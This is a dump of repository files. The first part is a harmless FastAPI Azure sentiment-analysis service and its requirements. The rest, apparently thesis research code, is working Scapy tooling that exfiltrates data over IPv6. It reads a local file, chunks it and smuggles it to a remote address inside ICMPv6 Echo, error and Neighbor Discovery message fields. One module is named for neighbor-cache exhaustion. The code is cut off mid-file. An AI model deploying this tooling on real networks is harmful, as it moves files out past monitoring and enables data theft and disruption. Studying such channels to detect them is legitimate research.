"cb15777b34f59e948290fbb918c96a80e1e9e7f8", "content_id": "9b5a059bfa1a979b7cc96216b9e77f065134b235", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 3803, "license_type": "no_license", "max_line_length": 96, "num_lines": 123, "path": "/main.py", "repo_name": "baky0905/azure-text-analytics", "src_encoding": "UTF-8", "text": "from fastapi import FastAPI\nfrom pydantic import BaseModel\nfrom utils import authenticate_client\nfrom dotenv import load_dotenv\nimport os\nimport logging\nfrom opencensus.ext.azure.log_exporter import AzureLogHandler\n\nload_dotenv()\n\napp = FastAPI()\n\nlogger = logging.getLogger(__name__)\nlogger.setLevel(logging.DEBUG)\nlogger.addHandler(AzureLogHandler(\n    connection_string=os.getenv(\"INSTRUMENTATION_KEY\")))\n\n\nclass Model(BaseModel):\n    text_to_analyze: list\n\n\[email protected](\"/\")\ndef sentiment_analysis_example(documents: Model):\n    \"\"\"Analyze the sentiment of the supplied documents with Azure Text Analytics.\n\n    Args:\n        documents (Model): request body whose `text_to_analyze` field is a list of strings.\n\n    Returns:\n        dict: per-document sentiment, confidence scores, and sentences.\n    \"\"\"\n\n    client = authenticate_client()\n\n    response_dict = {}\n\n    # Analyze all documents in a single service call instead of once per document\n    response = client.analyze_sentiment(\n        documents=documents.text_to_analyze)\n\n    for idx, document in enumerate(documents.text_to_analyze):\n        response_dict[response[idx][\"id\"]] = {\n            \"sentiment\": response[idx][\"sentiment\"],\n            \"confidence_scores\": response[idx][\"confidence_scores\"],\n            \"sentences\": [sentence[\"text\"] for sentence in response[idx][\"sentences\"]]\n        }\n\n        log_data = {\n            \"custom_dimensions\":\n            {\n                \"text_sentiment\": response[idx][\"sentiment\"]\n            }\n        }\n        logger.info('Text Processed Successfully', extra=log_data)\n\n    return response_dict\n\n    # [\n    #     {\n    #         \"id\": \"0\",\n    #         \"sentiment\": \"mixed\",\n    #         \"warnings\": [],\n    #         \"statistics\": null,\n    #         \"confidence_scores\": {\n    #             \"positive\": 0.5,\n    #             \"neutral\": 0,\n    #             \"negative\": 0.5\n    #         },\n    #         \"sentences\": [\n    #             {\n    #                 \"text\": \"I think this is super cool.\",\n    #                 \"sentiment\": \"positive\",\n    #                 \"confidence_scores\": {\n    #                     \"positive\": 1,\n    #                     \"neutral\": 0,\n    #                     \"negative\": 0\n    #                 },\n    #                 \"length\": 27,\n    #                 \"offset\": 0,\n    #                 \"mined_opinions\": []\n    #             },\n    #             {\n    #                 \"text\": \"But not as cool as you.\",\n\n    # print(\"Document Sentiment: {}\".format(response.sentiment))\n    # print(\"Overall scores: positive={0:.2f}; neutral={1:.2f}; negative={2:.2f} \\n\".format(\n    #     response.confidence_scores.positive,\n    #     response.confidence_scores.neutral,\n    #     response.confidence_scores.negative,\n    # ))\n    # 
for idx, sentence in enumerate(response.sentences):\n # print(\"Sentence: {}\".format(sentence.text))\n # print(\"Sentence {} sentiment: {}\".format(idx+1, sentence.sentiment))\n # print(\"Sentence score:\\nPositive={0:.2f}\\nNeutral={1:.2f}\\nNegative={2:.2f}\\n\".format(\n # sentence.confidence_scores.positive,\n # sentence.confidence_scores.neutral,\n # sentence.confidence_scores.negative,\n # ))\n\n\n# def analyze_text(text: Model):\n# response = {\n# \"sentiment\": [],\n# \"keyphrases\": []\n# }\n# no_of_text = len(text.text_to_analyze)\n# for i in range(no_of_text):\n# document = {\n# \"documents\": [\n# {\n# \"id\": i+1,\n# \"language\": \"en\",\n# \"text\": text.text_to_analyze[i]\n# }\n# ]\n# }\n# sentiment = utils.call_text_analytics_api(\n# headers, document, endpoint='sentiment')\n# keyphrases = utils.call_text_analytics_api(\n# headers, document, endpoint='keyPhrases')\n# response[\"sentiment\"].append(sentiment[\"documents\"][0])\n# response[\"keyphrases\"].append(keyphrases[\"documents\"][0])\n# return response\n" }, { "alpha_fraction": 0.4987804889678955, "alphanum_fraction": 0.704878032207489, "avg_line_length": 16.826086044311523, "blob_id": "8c14b8d32d0db3c1f18d5409256c8b0f2922b527", "content_id": "1487cc16d3cde26630ae5603037b62f1594d490e", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Text", "length_bytes": 820, "license_type": "no_license", "max_line_length": 32, "num_lines": 46, "path": "/requirements.txt", "repo_name": "baky0905/azure-text-analytics", "src_encoding": "UTF-8", "text": "asgiref==3.4.1\nautopep8==1.5.7\nazure-ai-textanalytics==5.1.0\nazure-common==1.1.27\nazure-core==1.16.0\ncachetools==4.2.2\ncertifi==2021.5.30\nchardet==4.0.0\nclick==8.0.1\nfastapi==0.66.0\ngoogle-api-core==1.31.0\ngoogle-auth==1.32.1\ngoogleapis-common-protos==1.53.0\ngunicorn==20.0.4\nh11==0.12.0\nhttptools==0.2.0\nidna==2.10\nisodate==0.6.0\nmsrest==0.6.21\noauthlib==3.1.1\nopencensus==0.7.13\nopencensus-context==0.1.2\nopencensus-ext-azure==1.0.8\npackaging==21.0\nprotobuf==3.17.3\npsutil==5.8.0\npyasn1==0.4.8\npyasn1-modules==0.2.8\npycodestyle==2.7.0\npydantic==1.8.2\npyparsing==2.4.7\npython-dotenv==0.18.0\npytz==2021.1\nPyYAML==5.4.1\nrequests==2.25.1\nrequests-oauthlib==1.3.0\nrsa==4.7.2\nsix==1.16.0\nstarlette==0.14.2\ntoml==0.10.2\ntyping-extensions==3.10.0.0\nurllib3==1.26.6\nuvicorn==0.14.0\nuvloop==0.15.2\nwatchgod==0.7\nwebsockets==9.1\n" } ]
3
antekirtt/thesis
https://github.com/antekirtt/thesis
c1f784f546f61b141bae6fa82e8bdbe35b1f731a
6763a0cdb775bdfa7f1bd6a1add1a1462b798a49
d93f3651a172aecb1ba310c3d9a60c479e036e5c
refs/heads/master
2021-01-17T15:34:24.960963
2016-12-01T21:51:03
2016-12-01T21:51:03
54,878,835
0
1
null
null
null
null
null
[ { "alpha_fraction": 0.4806051254272461, "alphanum_fraction": 0.48525989055633545, "avg_line_length": 34.80555725097656, "blob_id": "ac5a1a818a21fbbc8783f1e722f909fa17cc4b40", "content_id": "d2c089ff6a552ea02b238c3b4fee0d3da96029d1", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 5156, "license_type": "no_license", "max_line_length": 100, "num_lines": 144, "path": "/python/code/covertChannels.py", "repo_name": "antekirtt/thesis", "src_encoding": "UTF-8", "text": "#!/usr/bin/python\n\nimport sys\nimport re, uuid\nimport os\nimport readline\nfrom pprint import pprint\nfrom commands import *\nfrom scapy.all import *\nfrom receiver import *\n\n\n\"\"\"\nclass for Echo Request Covert Channels\n\"\"\"\nclass EchoRequest:\n\n def __init__(self):\n self.field = ''\n self.fieldContent = ''\n self.fields =['code', 'identifier', 'seqNum', 'data']\n self.name = 'EchoReqCovert'\n self.ipAddress = 'fe80::ad4:cff:fe13:7667'\n self.fileToSend = ''\n self.fileName = ''\n self.sendingBuffer = []\n self.maxPacketSize = 100\n\n #starts the interactive propmt\n def startSystem(self):\n Commands.setEchoRequestCovertHistory()\n running = 1\n while running:\n readline.parse_and_bind(\"tab: complete\")\n #we receive data from the keyboard \n command = raw_input(self.name + ' >>')\n #help command\n if re.match(\"help\", command):\n self.showHelp()\n #quit module command\n elif re.match(\"quit\", command):\n running = 0\n Commands.setCovertChannelHistory()\n elif re.match('setAdr', command):\n self.ipAddress = re.sub('setAdr', ' ', command).lstrip()\n print 'setting Ip address: ' + self.ipAddress\n elif re.match('iface', command):\n self.interface = re.sub('iface', ' ', command).lstrip()\n print 'setting interface: ' + self.interface\n elif re.match('code', command):\n self.field = 'code'\n self.fieldContent = re.sub('code', ' ', command).lstrip()\n print self.fieldContent\n elif re.match('data', command):\n self.field = 'data'\n self.fieldContent = re.sub('data', ' ', command).lstrip()\n print self.fieldContent \n elif re.match('rec', command):\n self.receiver()\n elif re.match('exec', command):\n self.execModule()\n elif re.match('show', command):\n self.buildPacket()\n #self.showAttributes()\n elif re.match(\"shell\", command):\n shell = 1\n Commands.setShellHistory()\n while shell:\n c = raw_input('$')\n if re.match(\"help\", c):\n self.showShellHelp()\n elif re.match(\"quit\", c):\n shell = 0\n Commands.setMainHistory()\n elif re.match(r'ls$', c):\n files = os.listdir('.')\n for f in files:\n print f\n elif re.match(r'ls -l', c):\n files = os.system(c)\n print files\n elif re.match('cd', c):\n path = re.sub('cd', ' ', c)\n try:\n os.chdir(path.strip())\n except:\n print 'Error! Wrong path!'\n elif re.match('select', c):\n path = re.sub('select', ' ', c)\n data = open(path.strip(), 'rb')\n self.fileToSend = data.read()\n data.close()\n self.fileName = path.strip()\n else:\n print 'Error! Command not found!'\n else:\n print 'Error! 
Command not found!'\n\n def showHelp(self):\n for entry in Help.getEchoRequestHelp():\n print entry\n\n def showShellHelp(self):\n for entry in Help.getShellHelp():\n print entry\n\n def showAttributes(self):\n attributes = [self.field]\n for entry in attributes:\n if entry:\n print entry\n else:\n print 'None'\n\n def buildPacket(self, chunk):\n if re.match('data', self.field):\n self.packet = IPv6(dst=self.ipAddress)/ICMPv6EchoRequest(data=chunk)\n if re.match('code', self.field):\n self.packet = IPv6(dst=self.ipAddress)/ICMPv6EchoRequest(code=chunk)\n #print self.packet.show()\n \n def execModule(self):\n self.chunkPackets(self.fileToSend)\n for chunk in self.sendingBuffer:\n self.buildPacket(chunk)\n send(self.packet, iface='wlan0')\n self.sendingBuffer = []\n\n def receiver(self):\n rec = Receiver()\n rec.receive()\n\n def chunkPackets(self, data):\n print '[*] size of file %d' % len(data)\n if len(data) <= self.maxPacketSize:\n self.sendingBuffer.append(data)\n else:\n chunksNumber = int(len(data)/self.maxPacketSize)\n chunks = [data[i:i+self.maxPacketSize] for i in range(0, len(data), self.maxPacketSize)]\n chunkNumber = 0\n for entry in chunks:\n self.sendingBuffer.append(entry)\n chunkNumber += 1\n print '[*] chunks %d' % chunkNumber\n" }, { "alpha_fraction": 0.6107091307640076, "alphanum_fraction": 0.6758321523666382, "avg_line_length": 26.639999389648438, "blob_id": "415ddc727dd0dd6b1bfcced0c8c7e21fea56ac95", "content_id": "6911872712dd3d3fc33b1fbcce360f763017636b", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 691, "license_type": "no_license", "max_line_length": 74, "num_lines": 25, "path": "/python/code/echoRequest.py~", "repo_name": "antekirtt/thesis", "src_encoding": "UTF-8", "text": "#!/usr/bin/python\n\nfrom scapy.all import *\n\n\n\n\"\"\"\nthe class build Echo Request messages\n\"\"\"\nclass EchoRequest:\n \n def __init__(self):\n print 'Echo Request'\n self.localAdr = \"2001:abcd:acad:1::2\"\n win = \"2001:abcd:acad:2:b485:2aec:9447:fd83\"\n\n def buildPacketEchoRequest(self, ipAdr):\n data = \"abcdefghijklmnopqrstuvwabcdefghi\"\n return IPv6(dst=ipAdr)/ICMPv6EchoRequest(id=0,seq=0)/data\n \n\n def execModuleEchoRequestNeighCacheExhaustion(self, exitIface, ipAdr):\n packetContainer = self.buildPacketEchoRequest(ipAdr)\n for x in range(1,10):\n send(packetContainer, iface=exitIface, verbose=False)\n" }, { "alpha_fraction": 0.6064353585243225, "alphanum_fraction": 0.6135282516479492, "avg_line_length": 46.69033432006836, "blob_id": "10fffb0ea5088ef01cba8bcc9fec942674fe6bd2", "content_id": "fdee144345d411889d456d3fc588b71488f974a3", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 48358, "license_type": "no_license", "max_line_length": 281, "num_lines": 1014, "path": "/python/code/allCovertTest.py", "repo_name": "antekirtt/thesis", "src_encoding": "UTF-8", "text": "#!/usr/bin/python\n\nimport sys\nimport re, uuid\nimport os\nimport readline\nfrom pprint import pprint\nfrom commands import *\nfrom scapy.all import *\nfrom receiver import *\nfrom bitstring import *\n\n\"\"\"\nThis class is for testing all covert channels in one\n\"\"\"\nclass AllCovertTests:\n\n def __init__(self, iface):\n self.dataToExfilt = ': this is the super secret data to exfiltrate to our attacking machine\\n' \n self.ipAddress = ''\n self.iface = iface\n self.name = 'AllCovertTests'\n self.fragmentation = False\n\n def startSystem(self):\n Commands.setAllCovertTestHistory()\n running 
= 1\n while running:\n readline.parse_and_bind(\"tab: complete\")\n #we receive data from the keyboard \n command = raw_input(self.name + ' >>')\n #help command\n if re.match('help', command):\n self.showHelp()\n #quit module command\n elif re.match('quit', command):\n running = 0\n Commands.setCovertChannelHistory()\n elif re.match('setAdr', command):\n self.ipAddress = re.sub('setAdr', ' ', command).lstrip()\n print 'setting Ip address: ' + self.ipAddress\n #toggle fragmentation\n elif re.match('frag', command):\n self.fragmentation = not self.fragmentation\n if self.fragmentation:\n print 'fragmentation is active'\n else:\n print 'fragmentation disabled'\n #execution of all tests\n elif re.match('exec', command):\n dest = DestinationUnreachableCovert(self.fragmentation)\n dest.execModule(self.dataToExfilt, '', '', '', self.iface, self.ipAddress)\n dest.execModule('', self.dataToExfilt, '', '', self.iface, self.ipAddress)\n dest.execModule('', '', self.dataToExfilt, '', self.iface, self.ipAddress)\n #dest.execModule('', '', '', self.dataToExfilt, self.iface, self.ipAddress)\n big = PacketTooBigCovert(self.fragmentation)\n big.execModule(self.dataToExfilt, '', self.iface, self.ipAddress)\n big.execModule('', self.dataToExfilt, self.iface, self.ipAddress)\n time = TimeExceededCovert(self.fragmentation)\n time.execModule(self.dataToExfilt, '', '', '', self.iface, self.ipAddress)\n time.execModule('', self.dataToExfilt, '', '', self.iface, self.ipAddress)\n time.execModule('', '', self.dataToExfilt, '', self.iface, self.ipAddress)\n #time.execModule('', '', '', self.dataToExfilt, self.iface, self.ipAddress)\n param = ParameterProblemCovert(self.fragmentation)\n param.execModule(self.dataToExfilt, '', self.iface, self.ipAddress)\n param.execModule('', self.dataToExfilt, self.iface, self.ipAddress)\n echoReq = EchoRequestCovert(self.fragmentation)\n echoReq.execModule(self.dataToExfilt, '', '', '', self.iface, self.ipAddress)\n echoReq.execModule('', self.dataToExfilt, '', '', self.iface, self.ipAddress)\n echoReq.execModule('', '', self.dataToExfilt, '', self.iface, self.ipAddress)\n echoReq.execModule('', '', '', self.dataToExfilt, self.iface, self.ipAddress)\n echoRep = EchoReplyCovert(self.fragmentation)\n echoRep.execModule(self.dataToExfilt, '', '', '', self.iface, self.ipAddress)\n echoRep.execModule('', self.dataToExfilt, '', '', self.iface, self.ipAddress)\n echoRep.execModule('', '', self.dataToExfilt, '', self.iface, self.ipAddress)\n echoRep.execModule('', '', '', self.dataToExfilt, self.iface, self.ipAddress)\n routerSol = RouterSolicitationCovert(self.fragmentation)\n routerSol.execModule(self.dataToExfilt, '', self.iface, self.ipAddress)\n routerSol.execModule('', self.dataToExfilt, self.iface, self.ipAddress)\n routerAdv = RouterAdvertisementCovert(self.fragmentation)\n routerAdv.execModule(self.dataToExfilt, '', '', '', '', '', '', '', '', '', '', self.iface, self.ipAddress)\n routerAdv.execModule('', self.dataToExfilt, '', '', '', '', '', '', '', '', '', self.iface, self.ipAddress)\n routerAdv.execModule('', '', self.dataToExfilt, '', '', '', '', '', '', '', '', self.iface, self.ipAddress)\n routerAdv.execModule('', '', '', self.dataToExfilt, '', '', '', '', '', '', '', self.iface, self.ipAddress)\n routerAdv.execModule('', '', '', '', self.dataToExfilt, '', '', '', '', '', '', self.iface, self.ipAddress)\n routerAdv.execModule('', '', '', '', '', self.dataToExfilt, '', '', '', '', '', self.iface, self.ipAddress)\n routerAdv.execModule('', '', '', '', '', '', 
self.dataToExfilt, '', '', '', '', self.iface, self.ipAddress)\n routerAdv.execModule('', '', '', '', '', '', '', self.dataToExfilt, '', '', '', self.iface, self.ipAddress)\n routerAdv.execModule('', '', '', '', '', '', '', '', self.dataToExfilt, '', '', self.iface, self.ipAddress)\n routerAdv.execModule('', '', '', '', '', '', '', '', '', self.dataToExfilt, '', self.iface, self.ipAddress)\n routerAdv.execModule('', '', '', '', '', '', '', '', '', '', self.dataToExfilt, self.iface, self.ipAddress)\n neighbSol = NeighborSolicitationCovert(self.fragmentation)\n neighbSol.execModule(self.dataToExfilt, '', '', self.iface, self.ipAddress)\n neighbSol.execModule('', self.dataToExfilt, '', self.iface, self.ipAddress)\n neighbSol.execModule('', '', self.dataToExfilt, self.iface, self.ipAddress) \n neighbAdv = NeighborAdvertisementCovert(self.fragmentation)\n neighbAdv.execModule(self.dataToExfilt, '', '', '', '', '', self.iface, self.ipAddress)\n neighbAdv.execModule('', self.dataToExfilt, '', '', '', '', self.iface, self.ipAddress)\n neighbAdv.execModule('', '', self.dataToExfilt, '', '', '', self.iface, self.ipAddress)\n neighbAdv.execModule('', '', '', self.dataToExfilt, '', '', self.iface, self.ipAddress) \n neighbAdv.execModule('', '', '', '', self.dataToExfilt, '', self.iface, self.ipAddress)\n neighbAdv.execModule('', '', '', '', '', self.dataToExfilt, self.iface, self.ipAddress)\n redirect = RedirectCovert(self.fragmentation)\n redirect.execModule(self.dataToExfilt, '', '', '', self.iface, self.ipAddress)\n redirect.execModule('', self.dataToExfilt, '', '', self.iface, self.ipAddress)\n redirect.execModule('', '', self.dataToExfilt, '', self.iface, self.ipAddress)\n redirect.execModule('', '', '', self.dataToExfilt, self.iface, self.ipAddress)\n \n elif re.match('rec', command):\n HelperClass.receiver(self.iface, self.ipAddress)\n\n def showHelp(self):\n for entry in Help.getAllCovertTestHelp():\n print entry\n\nclass DestinationUnreachableCovert:\n \n def __init__(self, frag):\n self.fragmentation = frag\n self.bandwidthCode = 1\n self.bandwidthLength = 1\n self.bandwidthUnused = 3\n self.bandwidthPayload = 8\n self.nameCode = 'Destination Unreachable code '\n self.nameLength = 'Destination Unreachable length '\n self.nameUnused = 'Destination Unreachable unused '\n self.namePayload = 'Destination Unreachable payload '\n \n def buildPacketCode(self, chunk, ipAdr):\n if self.fragmentation:\n return HelperClass.fragmentPacket(ipAdr, ICMPv6DestUnreach(code=chunk)/\"xxxxxxxx\")\n else:\n return [IPv6(dst=ipAdr)/ICMPv6DestUnreach(code=chunk)/'xxxxxxxx']\n\n def buildPacketLength(self, chunk, ipAdr):\n if self.fragmentation:\n return HelperClass.fragmentPacket(ipAdr, ICMPv6DestUnreach(length=chunk)/\"xxxxxxxx\")\n else:\n return [IPv6(dst=ipAdr)/ICMPv6DestUnreach(length=chunk)/\"xxxxxxxx\"]\n\n def buildPacketUnused(self, chunk, ipAdr):\n if self.fragmentation:\n return HelperClass.fragmentPacket(ipAdr, ICMPv6DestUnreach(unused=chunk)/\"xxxxxxxx\")\n else:\n return [IPv6(dst=ipAdr)/ICMPv6DestUnreach(unused=chunk)/\"xxxxxxxx\"]\n\n def buildPacketPayload(self, chunk, ipAdr):\n if self.fragmentation:\n return HelperClass.fragmentPacket(ipAdr, ICMPv6DestUnreach()/str(chunk))\n else:\n return [IPv6(dst=ipAdr)/ICMPv6DestUnreach()/str(chunk)]\n \n def execModule(self, dataCode, dataLength, dataUnused, dataPayload, exitIface, ipAdr):\n if dataCode:\n data = self.nameCode+dataCode\n sendingBuffer = HelperClass.chunkPackets(data, self.bandwidthCode, self.nameCode)\n for chunk in sendingBuffer:\n 
packetContainer = self.buildPacketCode(chunk, ipAdr)\n for packet in packetContainer:\n send(packet, iface=exitIface, verbose=False)\n if dataLength:\n data = self.nameLength+dataLength\n sendingBuffer = HelperClass.chunkPackets(data, self.bandwidthLength, self.nameLength)\n for chunk in sendingBuffer:\n packetContainer = self.buildPacketLength(chunk, ipAdr)\n for packet in packetContainer:\n send(packet, iface=exitIface, verbose=False)\n if dataUnused:\n data = self.nameUnused+dataUnused\n sendingBuffer = HelperClass.chunkPackets(data, self.bandwidthUnused, self.nameUnused)\n for chunk in sendingBuffer:\n packetContainer = self.buildPacketUnused(chunk, ipAdr)\n for packet in packetContainer:\n send(packet, iface=exitIface, verbose=False)\n if dataPayload:\n data = self.namePayload+dataPayload\n sendingBuffer = HelperClass.chunkPackets(data, self.bandwidthPayload, self.namePayload)\n for chunk in sendingBuffer:\n packetContainer = self.buildPacketPayload(chunk, ipAdr)\n for packet in packetContainer:\n send(packet, iface=exitIface, verbose=False)\n\n \nclass PacketTooBigCovert:\n\n def __init__(self, frag):\n self.fragmentation = frag\n self.bandwidthCode = 1\n self.bandwidthMtu = 4\n self.nameCode = 'Packet Too Big code '\n self.nameMtu = 'Packet Too Big MTU '\n \n def buildPacketCode(self, chunk, ipAdr):\n if self.fragmentation:\n return HelperClass.fragmentPacket(ipAdr, ICMPv6PacketTooBig(code=chunk)/\"xxxxxxxx\")\n else:\n return [IPv6(dst=ipAdr)/ICMPv6PacketTooBig(code=chunk)/\"xxxxxxxx\"]\n\n def buildPacketMtu(self, chunk, ipAdr):\n if self.fragmentation:\n return HelperClass.fragmentPacket(ipAdr, ICMPv6PacketTooBig(mtu=chunk)/\"xxxxxxxx\")\n else:\n return [IPv6(dst=ipAdr)/ICMPv6PacketTooBig(mtu=chunk)/\"xxxxxxxx\"]\n \n def execModule(self, dataCode, dataMtu, exitIface, ipAdr):\n if dataCode:\n data = self.nameCode+dataCode\n sendingBuffer = HelperClass.chunkPackets(data, self.bandwidthCode, self.nameCode)\n for chunk in sendingBuffer:\n packetContainer = self.buildPacketCode(chunk, ipAdr)\n for packet in packetContainer:\n send(packet, iface=exitIface, verbose=False)\n elif dataMtu:\n data = self.nameMtu+dataMtu\n sendingBuffer = HelperClass.chunkPackets(data, self.bandwidthMtu, self.nameMtu)\n for chunk in sendingBuffer:\n packetContainer = self.buildPacketMtu(chunk, ipAdr)\n for packet in packetContainer:\n send(packet, iface=exitIface, verbose=False) \n\nclass TimeExceededCovert:\n\n def __init__(self, frag):\n self.fragmentation = frag\n self.bandwidthCode = 1\n self.bandwidthLength = 1\n self.bandwidthUnused = 3\n self.bandwidthPayload = 8\n self.nameCode = 'Time Exceeded code '\n self.nameLength = 'Time Exceeded length '\n self.nameUnused = 'Time Exceeded unused '\n self.namePayload = 'Time Exceeded payload '\n\n def buildPacketCode(self, chunk, ipAdr):\n if self.fragmentation:\n return HelperClass.fragmentPacket(ipAdr, ICMPv6TimeExceeded(code=chunk)/\"xxxxxxxx\")\n else:\n return [IPv6(dst=ipAdr)/ICMPv6TimeExceeded(code=chunk)/\"xxxxxxxx\"]\n\n def buildPacketLength(self, chunk, ipAdr):\n if self.fragmentation:\n return HelperClass.fragmentPacket(ipAdr, ICMPv6TimeExceeded(length=chunk)/\"xxxxxxxx\")\n else:\n return [IPv6(dst=ipAdr)/ICMPv6TimeExceeded(length=chunk)/\"xxxxxxxx\"]\n\n def buildPacketUnused(self, chunk, ipAdr):\n if self.fragmentation:\n return HelperClass.fragmentPacket(ipAdr, ICMPv6TimeExceeded(unused=chunk)/\"xxxxxxxx\")\n else:\n return [IPv6(dst=ipAdr)/ICMPv6TimeExceeded(unused=chunk)/\"xxxxxxxx\"]\n\n def buildPacketPayload(self, chunk, ipAdr):\n if 
self.fragmentation:\n return HelperClass.fragmentPacket(ipAdr, ICMPv6TimeExceeded()/str(chunk))\n else:\n return [IPv6(dst=ipAdr)/ICMPv6TimeExceeded()/str(chunk)]\n \n def execModule(self, dataCode, dataLength, dataUnused, dataPayload, exitIface, ipAdr):\n if dataCode:\n data = self.nameCode+dataCode\n sendingBuffer = HelperClass.chunkPackets(data, self.bandwidthCode, self.nameCode)\n for chunk in sendingBuffer:\n packetContainer = self.buildPacketCode(chunk, ipAdr)\n for packet in packetContainer:\n send(packet, iface=exitIface, verbose=False)\n if dataLength:\n data = self.nameLength+dataLength\n sendingBuffer = HelperClass.chunkPackets(data, self.bandwidthLength, self.nameLength)\n for chunk in sendingBuffer:\n packetContainer = self.buildPacketLength(chunk, ipAdr)\n for packet in packetContainer:\n send(packet, iface=exitIface, verbose=False)\n if dataUnused:\n data = self.nameUnused+dataUnused\n sendingBuffer = HelperClass.chunkPackets(data, self.bandwidthUnused, self.nameUnused)\n for chunk in sendingBuffer:\n packetContainer = self.buildPacketUnused(chunk, ipAdr)\n for packet in packetContainer:\n send(packet, iface=exitIface, verbose=False)\n if dataPayload:\n data = self.namePayload+dataPayload\n sendingBuffer = HelperClass.chunkPackets(data, self.bandwidthPayload, self.namePayload)\n for chunk in sendingBuffer:\n packetContainer = self.buildPacketPayload(chunk, ipAdr)\n for packet in packetContainer:\n send(packet, iface=exitIface, verbose=False)\n \nclass ParameterProblemCovert:\n\n def __init__(self, frag):\n self.fragmentation = frag\n self.bandwidthCode = 1\n self.bandwidthPointer = 4\n self.nameCode = 'Parameter Problem code '\n self.namePointer = 'Parameter Problem pointer '\n \n def buildPacketCode(self, chunk, ipAdr):\n if self.fragmentation:\n return HelperClass.fragmentPacket(ipAdr, ICMPv6ParamProblem(code=chunk)/\"xxxxxxxx\")\n else:\n return [IPv6(dst=ipAdr)/ICMPv6ParamProblem(code=chunk)/\"xxxxxxxx\"]\n\n def buildPacketPointer(self, chunk, ipAdr):\n if self.fragmentation:\n return HelperClass.fragmentPacket(ipAdr, ICMPv6ParamProblem(ptr=chunk)/\"xxxxxxxx\")\n else:\n return [IPv6(dst=ipAdr)/ICMPv6ParamProblem(ptr=chunk)/\"xxxxxxxx\"]\n\n def execModule(self, dataCode, dataPointer, exitIface, ipAdr):\n if dataCode:\n data = self.nameCode+dataCode\n sendingBuffer = HelperClass.chunkPackets(data, self.bandwidthCode, self.nameCode)\n for chunk in sendingBuffer:\n packetContainer = self.buildPacketCode(chunk, ipAdr)\n for packet in packetContainer:\n send(packet, iface=exitIface, verbose=False)\n elif dataPointer:\n data = self.namePointer+dataPointer\n sendingBuffer = HelperClass.chunkPackets(data, self.bandwidthPointer, self.namePointer)\n for chunk in sendingBuffer:\n packetContainer = self.buildPacketPointer(chunk, ipAdr)\n for packet in packetContainer:\n send(packet, iface=exitIface, verbose=False)\n \n \nclass EchoRequestCovert:\n\n def __init__(self, frag):\n self.fragmentation = frag\n self.bandwidthCode = 1\n self.bandwidthId = 2\n self.bandwidthSeq = 2\n self.bandwidthData = 8\n self.nameCode = 'Echo Request code '\n self.nameId = 'Echo Request identifier '\n self.nameSeq = 'Echo Request sequence number '\n self.nameData = 'Echo Request data '\n\n def buildPacketCode(self, chunk, ipAdr):\n if self.fragmentation:\n return HelperClass.fragmentPacket(ipAdr, ICMPv6EchoRequest(code=chunk))\n else:\n return [IPv6(dst=ipAdr)/ICMPv6EchoRequest(code=chunk)]\n\n def buildPacketId(self, chunk, ipAdr):\n if self.fragmentation:\n return HelperClass.fragmentPacket(ipAdr, 
ICMPv6EchoRequest(id=chunk))\n else:\n return [IPv6(dst=ipAdr)/ICMPv6EchoRequest(id=chunk)]\n\n def buildPacketSeq(self, chunk, ipAdr):\n if self.fragmentation:\n return HelperClass.fragmentPacket(ipAdr, ICMPv6EchoRequest(seq=chunk))\n else:\n return [IPv6(dst=ipAdr)/ICMPv6EchoRequest(seq=chunk)]\n\n def buildPacketData(self, chunk, ipAdr):\n if self.fragmentation:\n return HelperClass.fragmentPacket(ipAdr, ICMPv6EchoRequest(data=chunk))\n else:\n return [IPv6(dst=ipAdr)/ICMPv6EchoRequest(data=chunk)]\n\n def execModule(self, dataCode, dataId, dataSeq, dataData, exitIface, ipAdr):\n if dataCode:\n data = self.nameCode+dataCode\n sendingBuffer = HelperClass.chunkPackets(data, self.bandwidthCode, self.nameCode)\n for chunk in sendingBuffer:\n packetContainer = self.buildPacketCode(chunk, ipAdr)\n for packet in packetContainer:\n send(packet, iface=exitIface, verbose=False)\n elif dataId:\n data = self.nameId+dataId\n sendingBuffer = HelperClass.chunkPackets(data, self.bandwidthId, self.nameId)\n for chunk in sendingBuffer:\n packetContainer = self.buildPacketId(chunk, ipAdr)\n for packet in packetContainer:\n send(packet, iface=exitIface, verbose=False)\n elif dataSeq:\n data = self.nameSeq+dataSeq\n sendingBuffer = HelperClass.chunkPackets(data, self.bandwidthSeq, self.nameSeq)\n for chunk in sendingBuffer:\n packetContainer= self.buildPacketSeq(chunk, ipAdr)\n for packet in packetContainer:\n send(packet, iface=exitIface, verbose=False)\n elif dataData:\n data = self.nameData+dataData\n sendingBuffer = HelperClass.chunkPackets(data, self.bandwidthData, self.nameData)\n for chunk in sendingBuffer:\n packetContainer = self.buildPacketData(chunk, ipAdr)\n for packet in packetContainer:\n send(packet, iface=exitIface, verbose=False)\n \n \nclass EchoReplyCovert:\n\n def __init__(self, frag):\n self.fragmentation = frag\n self.bandwidthCode = 1\n self.bandwidthId = 2\n self.bandwidthSeq = 2\n self.bandwidthData = 8\n self.nameCode = 'Echo Reply code '\n self.nameId = 'Echo Reply identifier '\n self.nameSeq = 'Echo Reply sequence number '\n self.nameData = 'Echo Reply data '\n\n def buildPacketCode(self, chunk, ipAdr):\n if self.fragmentation:\n return HelperClass.fragmentPacket(ipAdr, ICMPv6EchoReply(code=chunk))\n else:\n return [IPv6(dst=ipAdr)/ICMPv6EchoReply(code=chunk)]\n\n def buildPacketId(self, chunk, ipAdr):\n if self.fragmentation:\n return HelperClass.fragmentPacket(ipAdr, ICMPv6EchoReply(id=chunk))\n else:\n return [IPv6(dst=ipAdr)/ICMPv6EchoReply(id=chunk)]\n\n def buildPacketSeq(self, chunk, ipAdr):\n if self.fragmentation:\n return HelperClass.fragmentPacket(ipAdr, ICMPv6EchoReply(seq=chunk))\n else:\n return [IPv6(dst=ipAdr)/ICMPv6EchoReply(seq=chunk)]\n\n def buildPacketData(self, chunk, ipAdr):\n if self.fragmentation:\n return HelperClass.fragmentPacket(ipAdr, ICMPv6EchoReply(data=chunk))\n else:\n return [IPv6(dst=ipAdr)/ICMPv6EchoReply(data=chunk)]\n\n def execModule(self, dataCode, dataId, dataSeq, dataData, exitIface, ipAdr):\n if dataCode:\n data = self.nameCode+dataCode\n sendingBuffer = HelperClass.chunkPackets(data, self.bandwidthCode, self.nameCode)\n for chunk in sendingBuffer:\n packetContainer = self.buildPacketCode(chunk, 